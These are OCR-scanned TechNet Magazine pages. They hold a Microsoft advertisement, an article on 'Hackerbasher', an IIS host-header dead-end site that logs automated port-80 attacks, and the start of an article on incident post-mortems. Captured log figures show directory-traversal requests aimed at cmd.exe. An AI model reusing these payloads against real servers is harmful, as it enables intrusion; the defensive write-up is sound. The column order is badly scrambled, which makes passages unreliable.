The Yankee Group, a global research and consulting firm, concluded that a 
significant switch to Linux from Windows or Unix could cost three to four 
times as much without delivering tangibly better performance or business 
value. These findings are based on a non-sponsored worldwide survey of 1,000 


IT administrators and C-level executives in midsized and large enterprises. 


To get the full study, visit microsoft.com/getthefacts 


Microsoft® y [>] 
Windows 
Server System 


©2004 MicrosoftCorporation. All rights reserved. Microsoft, Windows, the Windowslogo, and Windows Server System are either registered trademarks or trademarks of Microsoft 
Corporation in the United States and/or other countries. The names of actual companies and products mentioned herein may be the trademarks of their respective owners. 


Marnie Hutcheson 


Hackers 


At Their Own 
Game With A 


’ Hackerbasher Site 


AT A GLANCE 


e Prevent automated 
attacks from reaching 
legitimate Web domains 

¢ Automatically divert 
attacks into a dead end 

© Get a single log that shows all 
attack traffic 


= Marnie Hutcheson is president of Ideva, a firm that 
Specializes in Web application design, development, 
and hosting. She has published a variety of technical 
Papers and books on various computing topics. You 
can reach her at marnie@ideva.com. 


44 TechNet Magazine 


implemented strategy that uses HTTP 1.1 


end where they can’t do damage. My site, 


attack and records the details about the at- 


it takes to set it up on your server. You also 
get the added benefit of being able to moni- 


On any given morning, a look through my production Web 
server's logs will show that my server farm is under a barrage of 
attacks. Hackers and crackers with automated IP port scanners 

can swamp a Web site with bogus requests and failed logons. 


The sheer volume of this traffic can reduce response times and overload | 
service request logs. Failed logon attempts (sometimes several hundred in a 
minute) can obliterate legitimate security reporting in the event viewer. Even 
if the hacker never gains access to anything, your Web site suffers. I use several 
procedures to minimize the attack surface. But even after hardening the server 
and putting it behind a firewall, it is still vulnerable to attacks on port 80. 
In this article, I will present an easily | 
_ by the hacker at xx.xxx.71.170. The hacker 
host headers to divert port 80 attacks away 
from unsecured public Web sites intoa dead — 


tor port 80 attacks in a single log file. See 


_ the sidebar “Setting Up Your Hackerbasher” 
_ for more information. 


As you can see in Figure 1, the Hacker- 
basher log contains evidence of a typical 


' automated attack. Several sites on the server 


are being attacked several times per second 


is trying to find cmd.exe along several dif- 
ferent paths by requesting that it execute 


_ with the command line /c+dir+c:\. Such 
called Hackerbasher, stops the automated | 


an attack typically lasts only a few seconds. 


_ If the command fails, the hacker automa- 
tack along with the IP address used by the — 
attacker. Hackerbasher doesn’t require any — 
special software and its only cost is the time 


tion increments the IP address and sends 
the request to the next unlucky server. If 
the command succeeds on any of the IP 


_ addresses in the server, the hacker will be at 
- the “C:\” prompt, ready to damage or de- 


stroy the server, steal valuable information, 
or whatever he or she wants. My firewall] 
doesnt keep out this kind of attack. 

Many of these attackers appear to be 
crackers—thrillseekers who simply want to 


break into something. Crackers usually sniff 
around for the obvious stuff such as unse- 
cured databases and leftover developer 


sample files. Obviously, some attackers are 
on a mission to get in and do damage. 

So how do we track down these people? 
One way is to use a honeypot: an informa- 
tion system resource intended to receive 
unauthorized or illicit use. The Honeynet 
Project (project.honeynet.org) was set up so that 
the good guys can watch and analyze what 
hackers do. The Honeynet Project reports 
that the average life expectancy of a 
honeypot on the Internet is 72 hours. The 
shortest known manual compromise time 
was 15 minutes, but a worm got the job 
done in 15 seconds. 

My solution is like a honeypot in that 
Hackerbasher has no production value. It 
is set squarely in the path of automated 
IP:80 attacks and, through its logs, it lets 
me study what the hackers are trying to do. 

Hackerbasher consists of one locked 
empty directory containing absolutely 
nothing—no home page, no virtual con- 
nections, no apps, and no server extensions. 


How It Works 


I got the idea for Hackerbasher one 
morning back in 2002 while I was wading 
through endless IS logs tracking a worm. I 
noticed that the hackers weren't attacking 
the sites by their domain names but by their 
IP addresses. I was sure there was an auto- 
mated tool out there systematically trolling 
through my IP pool looking for something 
listening on port 80. So, I thought, why not 
route all the IP:80 requests to a dead end in 
cyberspace? I then used host headers to do 
exactly that and called it Hackerbasher. 

Legitimate users don’t normally go to a 
Web site by typing an IP address, but auto- 
mated tools do. Humans use the domain 
name. The log files from Hackerbasher for 
the past two years prove this. The only 
nonhacker traffic to Hackerbasher has been 
the occasional request for an invalid URL 
oran unresponsive domain. I'll explain why 
Hackerbasher gets these requests later. 


www.technetmagazine.com 


Open the Microsoft 
Management Console (MMC) 
with the IIS snap-in. 


Assign one host header (or 

several) to each Web site there 
so that no virtual server is mapped 
to an IP address on port 80 without 
a host header name. Unless you 
have a good reason not to do so, 
make sure that no Web server is 
using “All Unassigned” IP 
addresses (see Figure 3). 


Create a Web site that points 

to an empty directory 
(preferably not on the C: drive). 
You can use the standard defaults 
in the site creation wizard and call 
the site whatever you want. 
Remember, it doesn’t need a 
registered domain name since it 
won't be listed in any DNS servers. 
Also, don’t install any server 
extensions like FrontPage® or 
SharePoint®. 


Once you have created the 

site, right-click on it and select 
Properties. Click the Directory 
Security tab and select Integrated 
Windows Authentication, then 
click OK. Be sure to uncheck 
Anonymous Access and Basic 
Authentication as shown in 
Figure A. 


Rackernshe 


On the Web Site tab, click 
the Advanced button. 


_ will give you an error 


to Active log Format and 


| Properties window 
_will open. 


other Web site, the MMC 


message telling you there is 
a conflict. All you need to 
do is go back through the 
other Web site Identities 
and find the one(s) using an 
IP address on port 80 
without a host header. 


On the Web Site tab, 

make sure that Enable 
Logging is checked; | use 
the W3C Extended Log 
File Format. Next, click 
the Properties button next 


the Extended Logging 


On the General 

Properties tab, select 
the log time period you 
prefer (I use Daily). Select 
the Extended Properties 
tab and then select the 
extended properties that 


Y) 
4) 
ay 
aD) 
go, 
Cc 
72) 
=) 
c 
—* 
ae 
Q) 
@) 
Se 
cq) 
= 
= 
ce) 
ep) 
ay 
cq) 
= 


_ you want to have appear in 


your log file. | check all of 

the extended properties, 

except Process Accounting. 

Note that the W3SVC number will be the 


name of the folder where the IIS logs from 
your Hackerbasher site will be stored. 


Server Extensions 2002 | H 
Web Site ] Operators | Performance: | ISAPI Filters | Home Directory | Documents | | 


Server Extensions 


Directory Security HTTP Headers | Custom Errors 
Use the Add button on the 


Advanced Multiple Web Site 
Configuration window to | 
select each IP address 

that you want to assign to 
Hackerbasher. For me, this is 
all the IP addresses that are 
visible to the public. | 


Apply your changes and | 

recheck your list to make 
sure that all your IP addresses 
are on it. If an IP address is 
already assigned to some 


oop ug Authentication Methods \ 


[baer 


i 
IP addre | Account used for anonymous access: 


Lee Oh + access is restricted using NTFS access control lists 
\ 
pp Secure ¢ \ T” Basic authentication (password is sent in clear test) 


eG | Select a default domain: 


i rs si 
2. | No user name/password required to access this resource. 


~Aulhenticated access ——-——— 
| For the following authentication methods, user name and password are 
| required when 
i + anonymous access is disabled, or 


‘or Windows domain servers } 


indows authentication 


OK Cancel épply Help 


Figure A Hackerbasher Security Settings 


Winter 2005 45 


Ei Microsoft Excel - ex040623XX-YY.xis. 
‘(Eile Edit View Insert Format Tools Data Window Help 


OS68e8n SRY t@a-< 1 @ =< A A fa # 100% S910 iB 
JAS? Y f& fmsadc/. oe { A%pc s AMpe. Jwinnt/system32/cmd.exe 

EI Gr ee A 
Te |tirme c-ip S-ip s-port cs-met cs-uri-stem es-uri- quer sc-' -status < 
0:02:19 KX XXKTLATICYY YYY.YY.25 80 HEAD /scripts/..%5c%5c. .Awini/e+dirtc.\ 40 
0:02:22 KOOL TT AICYY.YYY.YY.25: 80 HEAD /seripts/..%5c..%5ewinr /e+dirto\ 40 
| 10:02:22 XXX TL ATEYYYYY.YY.25 80’ HEAD /scripts/..%5c. Avinnt/sy /e+dirt+o\ 40 
0:02:22 XXIOOLTLATOYY. YYY.YY.25) 80: HEAD /winnt/system32/cmd.ex/e+dir+ co 401 
10:02:24 KKK TT ATOYY YYY.YY.20 80 HEAD [imsade/ A%epe..f. Ataplic+dirtc.\ 40° 
10:02:24 XX XOX TT ATOVYY.YYY.YY.20 80 HEAD /msade/..A%pe. Awinnt/e/c+dirto\ 40 

| 10:02:24 XX 0OCTIATLYY.YYY.YY.22 80 HEAD /scripts/. A%69v fwinnt/s fo+dir+co\ 40 
0:02:24 XK OOTAILYY YYY.YY.22 80 HEAD Awinnt/systern32/cmd.ex/otdirto\ 40 
4) 10:02:26 XKOKT1ATLYY.YYY.YY.25 80 HEAD /scripts/..A%8s..Awinnt/s/o+dirto;\ 40 
10:02:26 XX 0OCT1ATLYYYYY.YY.25 80) HEAD /scripts/..A%9v..Avinnt’s /e+dirte:\ 401: 
0:02:26 XXXOXOTTIATOYY.YYY.YY.25 80: HEAD /scripts/.. A%af. Awinnt/s'/o+dirto\ 40 
0:02:26 XX XXK.T1ATOVYY YYY.YY.25, 80 HEAD /scripts/.AQ. Awinni/sys /e+dirtco\ 401 
0:02:26 XXOK.T1ATEOYY.YYY.YY.25 80 HEAD /seripts/. AD. AD. AD.é/etdirto\ 40° 
0:02:26 XX XOXX.T1AICYY YYY.YY.25 80 HEAD Awinnt/system32/emd.ex/etdirtc:\ 40 


0:02:26 XXOOCTTAIOYY.YYYYY.25) 80 HEAD Awinnt/system32/emd.ex/etdirto\ 40 

0:02:26 KXOOCTIATOYY.YYYYY.25  80;HEAD Awinnt/system32/crmd.ex/e+dirte\ 40 5 

L997 XX KM YL I7LYY VYVY YY 90. Sf HEAD fain, Een oe en fotdirte\ AN1! 4 
Wa n\ hackerwacker { wetdey session. { lesttspaddie EL A) CS Rae le 


Ready 
Figure 1 A Hackerbasher Log 


attack fails to authenticate and the server 
returns a 401 error, effectively ending the 


On all my servers that are running 
Microsoft’ Windows’, Hackerbasher is se- 
cured with Windows NT” Challenge/Re- 
sponse authentication, or NTLM. It’s not 
Kerberos, but it works on older servers, in- 
cluding those that are not running Active | 
Directory’, so it’s the lowest common de- 
nominator. Every request to this site is pre- 
sented with the Windows Integrated 
Authentication challenge. The automated 


1 and 2). The Hackerbasher logs show that 
attacks launched against IP:80 don’t expect 
to have to try passwords, so the automated 
attack software increments the IP address 


The hacker at IP address xx.xxx.119.16 at- 
tacks yy.yyy.yyy.21, 22, 23, up to 29 from 


Hacker Hackerbasher 
Et Microsoft Excel - ex040626XX-YY.xIs : -|5| x| 
@] File Edit View Insert Format Tools Data Window Help I we x 


OSEBER SAY’ eRa-<! 
L539 4 i 4 


a | date time _ ~c-ip 0s. ieee s-com §- Ip S-pe es-method os “LCs sc-status 
539) 6/26/2004 6:31:47 XX XKK.119.16-- W3S\IDEVAYY.YYY.YY.27. 80 OPTIONS / =| 40 | 
540] 6/26/2004 6:31:43 XX.XXX.119.16:- W3S\IDEVEYY.YYY.YY.29 80 OPTIONS / - 401 

6/26/2004 6:31:41 XXXOXK.119.16- W3SYIDEVEYY. YYY.YY.21 SQ: OPTIONS / - 40 
6/26/2004 6:31:41 XXXXXK.119.16- W3S\IDEVEAYY.YYY.YY.22 80 OPTIONS /  - 401 
6/26/2004 6:31:41 XX XKK.119.16- W3S\IDEVAYY.YYY.YY.23 80 OPTIONS / — - 40 
544 /6/26/2004 6:31:41 XX XKX.119.16:-- WS3S\IDEVAYY.YYY.YY.25 80 OPTIONS /  - 401 
545) 6/26/2004 6:31:39 XX. XXK.119.166- W3SVIDEVAYY.YYY.YY.25 80 OPTIONS f —- 401 
946 6/26/2004 6:31:39 XX. XK.119.16:- W3S\IDEVEYY.YYY.YY.20 80 OPTIONS / - 40 
547) (6/26/2004 6:31:39 XX.XXX.119.16:- W3S\IDEVAYY YYY.YY.18 80 OPTIONS / — - 40 
1548 | 6/26/2004 6:31:39 XX. XXK.119.16:- W3S\IDEVAYY. YYY.YY.19 80 OPTIONS / — - 401 
549) 6/26/2004 6:31:39 XKXKK.119.16:- W3SVIDEVAYY. YYY.YY.29. 80 OPTIONS f - 40 
550/ 6/26/2004 6:31:38 XX XXX.119.16- W3S\IDEVEYY.YYY.YY.22 80 OPTIONS / = 401 
551 | 6/26/2004 6:31:38 XX.XXK.119.16- W3S\IDEVAYY YYY.YY.23. 80 OPTIONS / —- 40 
$52)6/26/2004 6:31:38 XX XX.119.16-- W3S\IDEVAYY.YYY.YY.24 80 OPTIONS / - 40 
553} 6/26/2004) 6:31:36. XX.XXX.119.16:- (W3S\IDEVAYY.YYY.YY.26 80: OPTIONS / - 401 
|6/26/2004 6:31:36 Eee) 119.16:- W3SIDEVAYY.YYY.YY.27 80/OPTIONS / -- 401 mat 
ASL ALPRI20NA 6: ae 4n4i& 


tay ~AA2SN | Dee i VY 34 BA. APTION 
4 


4 > WN hhackerw 


Ready 


Figure 2 Hackerbasher IIS Log from Failed Attacks 


46 TechNet Magazine 


attack (see the sc-status column in Figures | 


and tries again, as you can see in Figure 2. © 


- 6:31:36 until 6:31:47. That’s 17 attacks in 9 
' seconds! When the IP address increments 


beyond the IP addresses in my server, some- 
one else will be under attack. 
Even if someone were to provide valid 


' logon credentials to the Hackerbasher 
| site—even if they are a sysadmin for the 


domain—they will get an “HTTP Error 
403—Forbidden” message after they pass 
the Challenge/Response authentication be- 
cause there is no home page. 

I mapped all the root IP:80 addresses to 
Hackerbasher and set up host headers for 
all my other domains. The hackers can 
“bash” against the site as long as they like, 
butall they get from my server isa 401 (Un- 
authorized, Access Denied) failure message, 
shown in the sc-status column in Figure 1. 
Meanwhile, my customers sites purr along 


' without this traffic threatening their sites 


and filling their logs. 

Putting this security procedure in place 
cost nothing except the time it took to make 
sure all my sites had their host headers in 
order. For years J have used host headers to 
get the most out of my limited pool of IP 
addresses so setting this up wasn’t much 
work. All had to do was collect the root IPs, 
assign them to Hackerbasher, and make sure 
my customers’ host headers were in order. 

Most of my sites have at least two host 
headers defined, one with the “www” and 
one without, for example www.testerspara- 
dise.com and testersparadise.com. Some 
Web sites have multiple domain names 
pointing to them and multiple extensions; 
.com, .org, and so on. Notice in Figure 3 
that there is no identity defined that has an 
IP address without a host header name. 


A Single Log File 

The log excerpt you saw in Figure 1 shows 
only one type of attack, but one that is be- 
ing used against many IP:80 addresses on 
this server. (Reading your logs is always im- 
portant, as you'll read in the sidebar “Hard- 
ening Your Web Server.”) You don’t usually 
get a single log file that shows how the 
hacker attack is moving through the IP ad- 
dresses on a server. Normally the record of 
the attacks would be spread across multiple 
IIS site logs; an administrator would have 
to look through each one to piece together 
this information. This approach separates 


the legitimate users who failed to log ontoa 
host header domain (recorded in the log 
from that domain) from the crackers and 
hackers. It also adds a layer of security to 
my hosted sites by diverting the bogus traf- 
fic to a site that can give them what they 
deserve: an authentication prompt that will 
never let them in. 

In the course of a normal day, there will 
be several different types of attacks going 
on all at the same time. Before I put the 
Hackerbasher solution in place and col- 
lected all this information into one log, it 


was impossible to gauge the size and the © 


seriousness of this type of attack, since the 
details were buried in several IIS site logs. 

Figure 4 shows a series of failed logon 
attempts in the Windows Event Viewer. 
These failures are mostly hackers at- 
tempting to get into e-commerce, intra- 
net, disaster recovery, and similar secured 
sites. They are usually my first clue that a 
serious assault may be underway against 
some secured resource, like a database 
or an e-store. 

If you only have one secured Web site 
running in a server when you see a series 
of security failures like this, you can check 
the IIS log and determine if it is under 
attack and what the attackers are trying 
to do. You can also determine if the at- 
tack is being directed at some other re- 
source, such as an FTP server or an SMTP 
server. If you are running a hosting ser- 
vice with lots of secured sites, however, 
the evidence can be spread across too 
many site logs to track down. 

It really frustrated me that I couldn't get 
an accurate idea of how many attacks were 
going on and what type they were without 
spending days going through hundreds of 
logs. For example, I could see the logon fail- 
ures in my event log, but I couldn't close the 
loop between a particular logon failure in 
the event log and a specific failed server re- 
quest among all the secured virtual servers 
running on the computer. Figure 2 shows 
the Hackerbasher IIS log for this same time 
period. Notice that every request was sc- 
status 401 (Access Denied). I still can't doa 
precise correlation with IIS 5.0, but at least 
with Hackerbasher in place, I can see what's 
going on across all the IP addresses in the 
box. If my event logs don’t match my 


www.technetmagazine.com 


i| Action View | {| e >| | 


XXKYYY.ZZ 17 


Running 


Running XXXYVY.ZZ 18 

Running Bi. XKKVVYZZ.19 

Directory Security | HTTP Headers | Custorn Errors | Running SOX YYY. 2219 
Server Extensions Server Extensions 2002 | Running lo XXKYVY.Z2.20 

Web Site | Operators | Performance | ISAPIFiters | Home Directory | Documents | | Running © XXX YVY.2Z.20 
t, Web Se ldentincalcn ee Running XAXYYY.2ZZ.21 
i Decne: etecraisame a | | Running XXX.YYY.2Z.21 
lope ees 1 |] Running wuw.testersparadi... XXX. YYY.2Z.21 
| IP Address: XXX. YYY.2Z.21 y{ Advanced... {} Running pmuweb.testerspara,.. XXX.YYY.ZZ.21 
| fa Advanced Multiple Web Site Configuration xf.22 
| dere a0 561 i H Le} 


77 Multiple identities for.this Web Sie I, 


IP Address 


| © Unlimited 
| © Limited To: 


Connection Timeout: 900° secone 


MV HITP Keep-Alives Enabled 


1.000) conner 


;—I¥ Enable Legging --- 


(aaa 


Active log format: 


Ww3C Extended Log File Format 


PE XXX YYY.2Z.21 


IP Address | SSL Port | |: 


| TCP Port | Host Header Name | .23 
80 pee 
a aaa ec on fe 
30 mweb.testersparadise.com 


Figure 3 Host Header Definitions and IP Mapping in the MMC 


Hackerbasher log, it’s time to start looking 
for attacks on legitimate secured sites. 

Hackerbasher has proven to be a gold- 
mine in several ways. In Figures 1 and 2, 
each attack is failing, as you can see in the 
sc-status column. All these IP addresses are 
secured by Integrated Windows authenti- 
cation. The hacker tool simply quits attack- 
ing a particular IP address when it receives 
a 401 from the server. No matter what other 
defenses are in place, the hack is failing be- 
cause it cannot pass a logon request. 


Bj Event Viewer 


Early Detection 

On an average day, Hackerbasher is sub- 
jected to thousands of attacks from IP ad- 
dresses all over the world. I had no idea just 
how many attacks were going on per day 
until I set up Hackerbasher and routed all 
of the IP attacks to it. Over the past 24 
months, Hackerbasher has successfully cap- 
tured several different types of attempted 
hacks in its log files, alerting me to new 
types of attacks as soon as they appear. 
These are attacks that could succeed against 


Gal] Event viewer (Local) 
£5] Application Log 
Mh Security Log 
{3] System Log 


6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 
6/26/2004 


ailure Audit 
lure Audit 
ilure Audit 
ilure Audit 
ilure Audit 
jlure Audit 
lure Audit 
ailure Audit 
allure Audit 
jlure Audit 
lure Audit 
jure Audit 


lure Audit 
ailure Audit 
ailure Audit 
ilure Audit 


6/26/2004 
sjzej2004 


jlure Audit 
lure Audit 
allure Audit 
jlure Audit 
ailure Audit 
jlure Audit 


6:31:46 AM 
6:31:45 AM 
6:31:45 AM 
6:3l44 AM 
6:31:44 AM 
6:31:43 AM 
6:31:43 AM 
6:31:42 AM 
6:31:42 AM 
6:31:41 AM 
6:31:41 AM 
6:31:40 4M 
6:31:40 AM 
6:31:36 AM 
6:31:36 AM 
6:31:34 AM 
6:31:34 AM 
6:31:32 AM 
6:31:32 AM 
6:31:31 AM 
6:31:31 AM 
6:31:29 AM 
6:31:29 AM 


SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 

SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 


Account ... 
LogonjL... 
Account ... 
Logon/L... 
Account ... 
Logon/L... 
Account ... 
LogonjL... 
Account ... 
Logon/L... 
Account... 
Logon/L... 
Account ... 
Logon/L... 
Account ... 
LogonjL... 
Account... 
Logon/L... 
Account ... 
LogonjL... 
Account... 
LogonjL... 
Account ... 


Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 
Security 


SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 


Security 
Security 
Security 
Security 
Security 
Security 


Figure 4 Failed Logons from an Automated Attack 


Winter 2005 47 


© 

— 

cad) 

Vv) 

5@) 
g 
= 

6 

> 
‘an 
& 
(ei 

® 
cS 
(ge) 
ae 


an unsecured public site, underscoring the 
importance of having your server patches 
in place when a new attack finds it. 


How Host Headers Work 


In IIS 3.0, a machine could be assigned — 
_ UWS 4.0and later support the HTTP 1.1 host 


multiple static [P addresses, and it could 
have a virtual Web server running on port 
80 of each IP address, and that’s all. Each 
Web site with a domain name had to have a 
dedicated IP address. 

Domain Name Servers look up the IP 
address associated with a domain name. 
DNS assumes port 80 for all domain names, 


48 TechNet Magazine 


so a Web domain defined with a port other 


than 80 would not appear in any DNS en- | 


try. With HTTP 1.0, this meant that each IP 
address in the server was dedicated to a 
single domain. 

Host headers were added in HTTP 1.1. 


header definition. Host headers mean there 
are three parts to a Web server's identifty in 
the Web server: the IP address, the port 
number, and the host header. Using host 
headers, you can specify the address the old 
way, using the IP address and port number, 


' or you can assign a host header to an IP 


address that will use port 80. Several vir- 
tual servers (Web sites on the same ma- 


| chine) can share two of the three parts, but 


the third part must be unique to the par- 


' ticular virtual server. 


Host headers allow me to put several 


~ hundred small domains on one IIS server 
_ using only a handful of IP addresses. Even 


customers who have their own dedicated 
IP addresses use multiple host headers. 
Several different servers can run on the 


/ same machine with the same IP address. 
_ For example, the HTTP and FTP servers 
| often share an IP address for a specific do- 
~ main, but they must each have a dedicated 
' port on the IP address that they can com- 
_ municate through. Since FTP servers listen 
' on port 21 by default, the IP address would 
_ then be 123.123.234.234:80 for the HTTP 


server and 123.123.234.234:21 for the FTP 
server. These servers can listen on any port 


| defined for them, but most domains rely 
/ on DNS for domain name resolution and 
| since DNS uses port 80, they will also. 


Having multiple Web sites defined on a 
single IP address, with each one listening 
ona different port, is called IP overloading. 
This is useful when you own only one IP 


' address. It is also used to obfuscate the lo- 
' cation of some sites (like the server admin- 


istrative site), and allows the server to 
programmatically redirect traffic to a Web- 
based application on the server. A user ac- 
cessing a site defined in this way must 
specify the full IP address followed by a co- 
lon and the port number. 

The host header is the domain name that 
is requested by the user in the location field 


_ of their browser. Starting in HTTP 1.1, the 


browser puts the domain name portion of 
the URL into the Host Header Definition 
part of the HTTP request header. Using host 
headers, I can define multiple domain 
names for the same site (see Figure 3). 


Behind the Scenes 

By default,an HTTP server will listen on 
all unassigned IP addresses on the server 
using port 80. If you don’t define any spe- 
cific IP address, your server will be avail- 
able on all the IP addresses on the server; 
this is a very poor security practice but it is 
commonly used for SMTP and FTP serv- 
ers. The server that has an IP address as- 


signed with port 80 and no host header is  & 
the primary, or root, server for that address 
on that port. When a request is received | 
from a browser, the server tries to route the | 
request to its intended site (virtual server) 
using the IP address, the port, and the host — 
header name. If the host referenced in the — 


host header is unavailable or doesn’t exist, 


or if the page requested does not exist, the 
request is routed to the primary Web server 
of that IP:80 address. Hackerbasher is my 
primary Web server for all of the IP ad- | 
dresses on port 80. Figure 5 shows the host 
header mappings for Hackerbasher. Just as _ 
there are no site identities without a host 
header on the Web site, Hackerbasher is the _ 
only Web site with no host headers defined. 
Hackerbasher receives all the requests for 
missing pages and defunct or non-— 
functioning domains. This is often my first 
| Figure 5 Host Header Mappings for Hackerbasher 

' Microsoft Knowledge Base article 815021 
at support.microsoft.com/?id=815021). This cli- 
~ ent sends requests to the server using 


ated with an unchecked buffer issue (see ~ WebDAV methods. te) 


notification that a customer’s Web site is | 
unresponsive, and it is also handy to be able 
to let my customers know when they have | 
_ manually, The original signature is associ- 

If the request comes from an HTTP 1.0 | 
browser, hacker tool, or port scanner, and it _ 
does not contain a host header, the primary | 


missing pages. 


server (Hackerbasher) responds with an 


authentication challenge.Someone who ex- | | 
pected to see testerparadise.com on the | | 
banner of the page might get a response | 


from Hackerbasher instead. 


A legitimate request from an HTTP 1.0 © 
client will be routed to Hackerbasher be- | 


cause the browser request will contain only 


the IP address, not the host header name. | 
Even back in 2003, though, my site logs | 


showed that less than one percent of legiti- 
mate client traffic was using HTTP 1.0. So 


far, I haven't hada single user complain that 
they couldn’t get to a Web site, and my cus- _ 


tomers are pleased to have the hacker at- 
tacks diverted away from their sites. 


With Hackerbasher, a hacker will have to 


attack a production Web site through its 
domain name. Unfortunately, a small pro- 
portion of hacks I've seen do attack sites 
via their domain names. One example of 
this is the mysterious Microsoft-WebDAV- 
MiniRedir/5.1.2600 client which appears 


as the cs(User-Agent) in both automated 


www.technetmagazine.com 


Pees ve as 


Ditectow Security. i 12 
Server Extensions 


HTTP Headers 


Web Site Identification = 


Custom Errors 
Server Extensions 2002 
Web Site | Operators | Performance | ISAPI Filters | Home Directory | Documents 


7 HTTP Keep-lives Enabled 


pI Enable Logging 
Active log format: 


Prog 


Description: [rackerbasher au a Ls oo 

IP Addiess: f209.208.11.17 =] Advanced... | [@jel> 

TCP Pott [a ssi Fat: | [Description state [Hos 

i mee i & hackerbasher Running 
“means = eS 
@ Unlimited 
ois i Multiple identiti this Web Site - 
© Limited To: 100 connections fe Multpie sceoiies lor ls web ote 
Connection Timeout: 900, seconds 


fwac Extended Log File Format ¥] 


OK | Cancel | eet 


ei 


attacks and in suspicious requests in pro- 
duction server logs that appear to be driven 


Resources 


IP Address: 


Winter 2005 49 


Hacking: 


Fight Back 


Kelly J. Cooper 


The Day After: 


Your First Reponse 


¢ Defining a post-mortem 

¢ Types of incidents to submit 
to a post-mortem review 

¢ Organizing the post-mortem 

¢ Managing and facilitating the 
meeting 

e Topics to cover 

¢ Results and follow-ups 

¢ Integration of newfound 
knowledge into your company 

Kelly J. Cooper is a CISSP with nine years experience 

in the Internet Service Provider business, specializing 

in operations security and incident response. She isa 


founding member of The CooperCain Group, Inc. 
(Www.coopercain.com). 


AT A GLANCE 


50 TechNet Magazine 


To A Security 


Breach 


an internal configuration error that resulted 


ral disaster that impacted your company’s 
physical location. Any event that didn’t go 


that need to be checked, is a perfect candi- 
date for a post mortem. 
A post mortem is a review of what hap- 


who, what, how, when, and why of the inci- 
dent. Even if the incident was clearly docu- 
mented at the time, youre still going to need 


The security incident is over. The techs have all gone home and 
are snug in their beds, dreaming of flawless code trees and 
buffer-overflow repellent. Upper management has done all the 
damage control they can. Everyone's shifting back into their 


normal activities and schedules. Everyone, that is, except you. What can you 
do to prevent this from ever happening again? 

The best way to understand howa security incident happened is to conduct — 
a post mortem. Incidents can range from — 


_ terin order to improve your processes, tools, 


and training for the future. These improve- 
ments may not prevent all future attacks, 
but they will allow you to prepare your busi- 


_ ness for the next incident. 
in system downtime, all the way up through | 
an attack on your company, or evena natu- | 


Scheduling 


You need to schedule your post mortem 


_ as soon as possible after the incident. Give 
as well as you hoped, or any set of processes 


everyone the opportunity to recover first 


_ (especially if people need to catch up on 
- sleep), but don’t wait too long. Get every- 
_ one who was actively involved in the inci- 
pened; a good post mortem delves into the | 


dent, or at least a representative from each 


_ person’s group, into a room. You may not 
_ be able to schedule time with any upper- 
_ level executives who participated, but you 
to review how things could have gone bet- 


can touch base with them later. In fact, their 


presence can hinder an open dialogue, so 


carbon-copy them on the invite, but don't | 


require their presence. 


Materials 

Have all participants bring whatever 
notes they may have made. If you have a 
trouble ticket or a timeline or any kind of 
documentation of the incident, print it out 
and provide copies to everyone. Be sure to 
mark the printouts as confidential. At the 
beginning of the meeting, tell people either 
to hand them back at the conclusion of the 
meeting or keep the materials in a locked 
drawer. Many people would rather hand the 
papers back. 

Make the confidentiality issue clear at the 
beginning of the meeting so that any notes 
the participants might take for themselves 
arent written on the printout that they then 
decide they want to hand back. After the 
meeting, shred any returned documenta- 
tion. You don’t want dumpster divers get- 
ting their hands on the details of your 
security problems. If you don’t havea shred- 
der, buy one. Youll be surprised by how 
many people will use shredders once they're 
available to them. 


Agenda 

Post mortems can be extremely emo- 
tional. There’s a tendency to fling blame 
around the table and around the company. 
Your job is to minimize the emotional 
outbursts by steering the meeting so that 


everyone can draw as much useful infor- | 
mation as possible. You may need to dis- 


cuss an amnesty agreement with the group, 
where you trade a promise of no firings in 
exchange for honesty. This may sound im- 
practical in some work environments, but 
it should be seriously considered. You 
should also think about implementing a 
policy like this on various whistleblower 
policies and legislation. 

The first thing to consider when design- 
ing your agenda is the structure. The 
easiest and the simplest to follow is chro- 
nological: what happened first, next, and 
last? Who did what and when? How long 
between the first and second event? 

A structured agenda is useful for bring- 
ing people back on topic when they start to 
go off on tangents. Of course, remember 


www.technetmagazine.com 


that nothing ever goes according to plan. | 


Leave room for complex discussions and 
be willing to follow up with specific indi- 


viduals outside of the meeting in order to | 


puta tangent aside, at least temporarily. 


Asthe meeting coordinator, you also have » 


your own agenda. Aside from whatever po- 
litical pressure you may be under, you also 
have a responsibility to compile data that 
will allow your company to be better pre- 


pared for the next incident. You may have | 
to create an incident response process from — 


scratch, including training and documen- 
tation. Look at what worked and what didn't 
throughout the post mortem as the basis 


_ for your process. If an incident handling 


process already exists, look for areas where 
education or improvements are needed. 


Starting Your Analysis 


First, you have to get the meeting started. — 
The sidebar “Five Starter Questions” can | 
: fore the customers themselves were aware 


help kick off the discussion. 
If there is no timeline, youll probably 
have to piece this material together from 


_ time stamps on trouble ticket entries and e- 


mail messages. If none of this material is 
available in the meeting, discuss the gener- 
alities and try to establish specifics after the 


| meeting is over. Make a note for the future 


that creating a timeline and fully document- 


ing the incident should be part of the inci- 


dent response process. 

Once youve determined when and how 
the issue was recognized as a security inci- 
dent, you may be able to parlay that infor- 
mation into some sort of early warning 


| SUOIISOND 18e1S aAlS 


| 
| 
a 


attack in the course of their normal investi- 
gation of an outage or reported problem. 
As different attacks evolved, the symp- 
toms of each were broken down and pro- 
vided to the operators. This became an early 
warning system that often allowed ISPs to 
notice that customers were under attack be- 


of the escalating problem. 


Discussing the Incident 

Once you have good idea of what hap- 
pened and how it was recognized, assess 
the quality of the response by asking some 
of the questions in the “Post-Mortem Dis- 
cussion Points” sidebar. 

Listen closely to people’s complaints. 
Gripe sessions are the best source for un- 
derstanding company friction, whether it’s 
interpersonal issues, tool malfunctions, or 
arcane and frustrating processes. If people 
don’tlike a process or tool, they won't use it. 


Once you’ve determined when and how the 
issue was recognized as a security incident, 
you may be able to parlay that information 
into some sort of early warning system. 


system and teach the rest of the staff to rec- 
ognize the symptoms. 

Por instance, in the early days of Denial 
